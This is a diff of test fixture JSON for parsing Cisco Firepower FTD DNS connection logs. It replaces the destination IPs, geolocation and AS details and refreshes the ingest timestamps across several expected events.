+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -265,7 +271,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -307,24 +313,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -372,7 +381,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -381,8 +390,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351795230Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
+ "ingested": "2021-12-09T13:32:56.096904600Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -412,7 +421,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -453,24 +462,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 200,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -518,7 +530,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -527,8 +539,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351797116Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
+ "ingested": "2021-12-09T13:32:56.096910500Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -559,7 +571,7 @@
 "dns_query": "www.elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -601,24 +613,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 193,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -666,7 +681,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -675,8 +690,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351798952Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
+ "ingested": "2021-12-09T13:32:56.096921600Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -706,7 +721,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -748,24 +763,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -813,7 +831,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -822,8 +840,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351800777Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
+ "ingested": "2021-12-09T13:32:56.096928100Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -853,7 +871,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -894,24 +912,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 199,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -959,7 +980,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -968,8 +989,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351802641Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:32:56.096934500Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1000,7 +1021,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1043,24 +1064,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 221,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1108,7 +1132,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1117,8 +1141,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351804509Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
+ "ingested": "2021-12-09T13:32:56.096940100Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1148,7 +1172,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1189,24 +1213,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1254,7 +1281,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1263,8 +1290,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351806300Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
+ "ingested": "2021-12-09T13:32:56.096946300Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1294,7 +1321,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1336,24 +1363,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 722,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1401,7 +1431,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1410,8 +1440,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351808085Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:32:56.096952400Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1442,7 +1472,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1484,27 +1514,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Seattle",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -122.3303,
- "lat": 47.6109
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 16509,
+ "number": 20712,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "205.251.196.144",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 75,
- "ip": "205.251.196.144",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1552,7 +1582,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "205.251.196.144"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1561,8 +1591,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351809886Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused",
+ "ingested": "2021-12-09T13:32:56.096958500Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1592,7 +1622,7 @@
 "dns_query": "refusedthis.com",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "205.251.196.144",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1626,24 +1656,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 313,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 4
 },
 "dns": {
@@ -1694,7 +1727,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1703,8 +1736,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351812056Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure",
+ "ingested": "2021-12-09T13:32:56.096965100Z",
